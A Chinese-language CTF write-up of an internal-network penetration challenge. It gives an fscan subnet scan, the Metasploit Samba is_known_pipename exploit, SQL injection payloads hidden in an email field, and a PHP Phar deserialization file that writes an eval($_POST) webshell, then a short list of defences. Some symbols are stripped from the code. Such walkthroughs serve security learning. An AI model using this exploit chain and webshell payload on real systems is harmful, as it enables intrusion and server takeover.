1. 内网渗透实战环境搭建与SSH连接在CTF比赛中内网渗透是常见的考察方向。我们先从最基本的SSH连接开始说起。假设你已经获得了靶机的SSH登录凭证用户名和密码连接命令非常简单ssh ctfshowpwn.challenge.ctf.show -p 28146这里有几个关键点需要注意用户名是ctfshow服务器地址是pwn.challenge.ctf.show端口号是28146非默认的22端口连接成功后第一件事就是上传必要的工具。在内网渗透中fscan是个非常实用的轻量级扫描工具。我通常会先在本机用wget下载最新版的fscan然后通过scp上传到靶机scp -P 28146 ./fscan ctfshowpwn.challenge.ctf.show:/tmp/上传完成后记得给fscan添加可执行权限chmod x /tmp/fscan2. 内网扫描与Samba漏洞利用2.1 使用fscan扫描内网有了fscan这个利器我们就可以开始扫描内网了。执行以下命令/tmp/fscan -h 172.2.107.0/24这个命令会扫描172.2.107.0/24网段的所有主机。在实际测试中我发现.5和.6这两台主机比较可疑172.2.107.5运行着Web服务80端口172.2.107.6开放了445端口Samba服务2.2 利用Samba漏洞获取flag对于172.2.107.6的445端口我们可以使用Metasploit框架来利用Samba漏洞。靶机已经预装了msf直接运行msfconsole use exploit/linux/samba/is_known_pipename set rhost 172.2.107.6 exploit这个漏洞利用的是Samba服务的已知管道名漏洞。成功利用后我们就能拿到第一个flag。在实际操作中我发现这个漏洞利用非常稳定成功率很高。3. SSH端口转发与Web服务访问3.1 建立SSH隧道由于172.2.107.5的Web服务无法直接从外部访问我们需要通过SSH端口转发来访问。执行以下命令ssh -L 8085:172.2.107.5:80 ctfshowpwn.challenge.ctf.show -p 28146这个命令的意思是将本地的8085端口映射到内网172.2.107.5的80端口。这样我们访问本地的8085端口就相当于访问内网的Web服务。3.2 发现源码泄露访问http://localhost:8085后我在页面中发现了一个源码泄露点。通过分析页面源代码找到了Gitee上的项目地址。下载源码后我开始进行代码审计。4. 代码审计与漏洞挖掘4.1 登录功能分析在审计登录功能时我发现开发者使用了doFilter函数对用户名和密码进行了严格过滤这使得传统的SQL注入难以实现。不过在dorest函数中发现了突破口// 示例代码 function dorest($email) { // 仅验证email格式未做其他过滤 if(filter_var($email, FILTER_VALIDATE_EMAIL)) { // 执行SQL查询 } }4.2 构造恶意email实现注入利用这个漏洞我们可以构造特殊的email地址实现SQL注入emailunion/**/select/**/username/**/from/**/user#qq.comusername123 emailunion/**/select/**/password/**/from/**/user#qq.comusername123通过这些payload我成功获取到了管理员凭证用户名ctfshow密码ctfshase????最后几位被隐藏。5. 文件上传与Phar反序列化攻击5.1 分析文件上传功能登录系统后我发现了一个文件上传功能。经过测试发现它只检查文件扩展名不验证文件内容。这意味着我们可以上传任意文件只要扩展名是允许的如.png。5.2 发现反序列化漏洞在审计api/index.php时发现了一个关键漏洞// 示例代码 function sendResetMail($mail) { file_put_contents(/var/www/html/mail_cache/cache.php, $mail); }这个函数直接将$mail内容写入文件如果能够控制$mail就能实现任意文件写入。进一步追踪发现这个函数可以通过反序列化调用。5.3 构造Phar攻击文件由于没有直接的反序列化入口我决定使用Phar反序列化攻击。创建以下PHP文件?php class action { private $email.eval(\$_POST[1]));//; } $a new action(); $phar new Phar(yu22x.phar); $phar-startBuffering(); $phar-setStub(file_get_contents(a.png).?php __HALT_COMPILER(); ?); $phar-addFromString(test.txt,yu22x); $phar-setMetadata($a); $phar-stopBuffering();这里有几个关键点需要准备一个真实的a.png文件作为stub将恶意代码放在$email属性中生成phar文件后将扩展名改为.png5.4 上传并触发Phar文件将生成的yu22x.png上传到服务器后通过phar伪协议触发反序列化http://localhost:8085/api/index.php?aviewfilephar:///var/www/html/ckfinder/userfiles/images/yu22x.png成功触发后会在/var/www/html/mail_cache/目录下生成cache.php文件内容就是我们构造的恶意代码。最后使用蚁剑等工具连接这个webshell就获得了完整的控制权限。6. 经验总结与防御建议在实际渗透测试中这类漏洞链非常常见。从我的经验来看防御这类攻击需要多层次的防护对于Samba服务应及时更新补丁关闭不必要的共享Web应用应该对所有用户输入进行严格过滤包括email格式验证文件上传功能应该验证文件内容而不仅仅是扩展名禁用不必要的PHP函数如unserialize在php.ini中设置phar.readonlyOn防止Phar反序列化攻击在CTF比赛中这类题目很好地模拟了真实世界的渗透场景。通过这次实战我更加深刻地理解了内网渗透的完整流程和各种技术的结合运用。